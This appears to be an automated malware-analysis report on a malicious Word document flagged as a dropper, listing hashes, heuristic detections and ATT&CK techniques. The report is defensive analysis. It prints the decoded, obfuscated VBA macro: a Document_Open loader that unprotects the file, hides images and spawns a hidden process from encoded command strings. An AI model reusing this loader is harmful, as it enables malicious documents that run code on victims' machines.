Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 240b7d2825183226…

MALICIOUS

Office (OLE)

534.0 KB Created: 2018-04-22 18:20:00 Authoring application: Microsoft Office Word First seen: 2018-10-07
MD5: fdb4b4520034be269a65cfaee555c52e SHA-1: fe94be7b44239bd1aff24a436294031dd4a2d4c2 SHA-256: 240b7d2825183226af634d3801713b0e0f409eb3e1e48e1d36c96d2b03d8836b
264 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains heavily obfuscated VBA macros, including an auto-exec loader in the Document_Open subroutine, which is designed to run automatically when the document is opened. Heuristics indicate the use of GetObject and execution sinks, suggesting the macro's purpose is to download and execute a second-stage payload. The ClamAV detection name 'Ole2.Dropper.Corona-10006209-0' further supports its role as a dropper.

Heuristics 8

  • ClamAV: Ole2.Dropper.Corona-10006209-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Ole2.Dropper.Corona-10006209-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5672 bytes
SHA-256: 8d39beb802b6acce3364ca61fabe73e6e99cfd60ec6dfd31965f0f22bea4e6ea
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
        Sub Document_Open()
           
           SH_Images
           worker
           
            
        End Sub
        
        Sub SH_Images()
            Dim item As Variant
            If ActiveDocument.ProtectionType <> wdNoProtection Then
            If ActiveDocument.ActiveWindow.View.ReadingLayout = True Then
                ActiveDocument.ActiveWindow.View.ReadingLayout = False
                
            End If
                ActiveDocument.Unprotect Password:="123#123"
            End If
            
            For Each item In ActiveDocument.Shapes
                If item.Name = "Picture 11" Or item.Name = "Picture 13" Then
                    item.Visible = False
             End If
            Next
        
        End Sub
        
        Public Function worker() As Variant
            Dim d6b14a3279aa4e50879f30bdb7428338
            Dim ccsde As String
            Dim quote
            quote = Chr(39)
            d6b14a3279aa4e50879f30bdb7428338 = 0
            Dim e1a6f5f64f18427083f1bf8a066f38bf, d8b3a22df93e4d6895993684f7f96a76, c150d24b82704204b745abcd25719d4b, cda8c7d4d8b94b488344f62145544bf6, eecd8ad5b4a345e5a790fcfc75d34f80
            e1a6f5f64f18427083f1bf8a066f38bf = "."
            Call MC(d8b3a22df93e4d6895993684f7f96a76, "186fy818665qj5f65i6crupu6b5274h74up46746auo67i678c74o5bs81856ey4apjz")
            Call MCX(c150d24b82704204b745abcd25719d4b, d8b3a22df93e4d6895993684f7f96a76, "19906267msiq4c4b78896b885c7er6clhq8c8cgv8dh7a8b8dhqx8e69vri")
            Set cda8c7d4d8b94b488344f62145544bf6 = c150d24b82704204b745abcd25719d4b.SpawnInstance_
            cda8c7d4d8b94b488344f62145544bf6.ShowWindow = d6b14a3279aa4e50879f30bdb7428338
            Call MC(eecd8ad5b4a345e5a790fcfc75d34f80, "0b8274z59787278wg5fj5e45j67yg67s39rmp67i7dl7a7an5fl674e5478813d458274793e3dh6a7b7d5a6e507e5e")
            ccsde = rvs("0e7epo7d85n7380n8176v537a5a2e3bmi536653i512e7087sr7e4fm61612e3br515dp7bw5bo6f5c52j2e30342e89") + "$pth=" + quote + (ActiveDocument.path + "\" + ActiveDocument.Name) + quote + ";"
            ccsde = ccsde + rvs("274b999b644e4e624bm6b9b648e8c7b548a76959b6c95vy9b475497x889b6f474b777b6f47548c758a966b70956e47887a6a709062s6d76996c888a8f4f4b70t479095474b6b7b50a290s6d474f4b7055738c958e9b8f47546e9b475e5e575750tua24b999bj644b90559a7773r709b4f4e51514e508259846269796c8892a4a4624b999b64829aa07a9b6c94557b6c9f7b558c756a766b90958eq8461q61889a6a7070558e6c9b9a7b9970958e4f829aa09a7b6c94556a96959d8c997b846161s6d79769489887a8c5d5b9a7bl9990756em4f4b997b505062706c7f4f4b797b5062")
            ccsde = ccsde + "}"""
            Dim UserValidator
            UserValidator = ThisDocument.Shapes(4).TextFrame.TextRange.Tables(2).Cell(1, 1).Range.Text
            If (InStr(UserValidator, "Miles ")) Then
                eecd8ad5b4a345e5a790fcfc75d34f80.create ccsde, Null, cda8c7d4d8b94b488344f62145544bf6, Null
            End If
        End Function


Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{F2DCA758-6AA5-401F-B080-B59F75B31EAC}{9BDC9994-C712-40A6-8606-12A143FB2E2B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit

Private Sub CommandButton1_Click()



End Sub

Private Sub CommandButton2_Click()
Dim item As Variant


For Each item In ListBox1.List
MsgBox item

Next



End Sub

Attribute VB_Name = "Module6"
Sub MCX(ByRef in_o, ByRef in_g, ByVal in_x)
    Dim UserValidator As String
    UserValidator = ThisDocument.Shapes(4).TextFrame.TextRange.Tables(2).Cell(1, 1).Range.Text
    If InStr(StrCell, "Admin") Then
        MsgBox ("User Is not Valid")
    Else
    
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.